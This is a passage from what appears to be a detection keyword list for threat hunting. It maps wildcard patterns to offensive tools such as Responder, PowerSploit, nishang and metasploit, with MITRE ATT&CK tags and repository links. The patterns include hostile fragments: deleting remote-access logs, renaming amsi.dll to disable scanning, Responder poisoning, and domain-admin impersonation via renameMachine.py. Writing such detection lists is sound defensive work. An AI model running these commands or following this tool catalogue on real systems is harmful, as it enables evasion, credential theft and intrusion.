Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Remove-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*remove-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Remove-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*remove-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Remove-PoshRat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*removeRegTrace*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z"
+"*Remove-Update.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Remove-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*ren C:\Windows\System32\amsi.dll *.dll","greyware_tool_keyword","ren","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A"
+"*renameMachine.py -current-name * -new-name * -dc-ip * *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*renameMachine.py -current-name * -new-name*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
tools","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*replace_key_iv_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z"
+"*replace_video_fake_plugin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*RequestAsPython-PowerShell.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. 
and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z"
+"*reshacker_setup.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*ResourceDevelopment_EstablishAccounts_RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*ResourceDevelopment_Server_DNSLog.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*ResourceDevelopment_Server_LDAPServer.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*ResourceDevelopment_WebServices_TencentAPIGateway.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*Resources/Design/NinjaStyle.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Resources/drone.dll*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Resources\donut.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*responder * --lm*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*responder -i *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*responder --interface*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Responder.py*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*Responder/tools/MultiRelay/bin/Runas.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Responder/tools/MultiRelay/bin/Syssvc.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*responder-http-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*responder-http-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Responder-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*responder-smb-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*responder-smb-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Responder-Windows*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*RestartKeePass.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*restic2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*restore_signature.sh *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*RestrictedAdmin.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z"
+"*return-wizard-rce-exim.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*rev_kali_192_168_0_110_1234*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*reveng007/C2_Server*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*reveng007/DarkWidow*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process 
+ (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z"
+"*reveng007/Executable_Files*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*reveng007/ReflectiveNtdll*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z"
+"*reveng007/SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
+"*reverse_shell_minified.js*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,,
+"*reverse_tcp_x64.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*reverse_win_http.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*reverseDisableWinDef.cpp*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z"
+"*ReverseProxy.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*ReverseShell.ps1*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z"
+"*ReverseShell_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z"
+"*ReverseSocksProxyHandler.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - 
T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z"
+"*ReverseSocksProxyHandler.py*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z"
+"*ReversingID/Shellcode-Loader*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
+"*RevertToSelf was successful*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Revoke-Obfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. 
used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","668","121","2020-02-11T19:40:37Z","2017-07-11T01:20:48Z"
+"*RevWinDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z"
+"*RhinoSecurityLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*RhinoSecurityLabs/pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*-Rhost * -Port * -Cmd *cmd /c*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
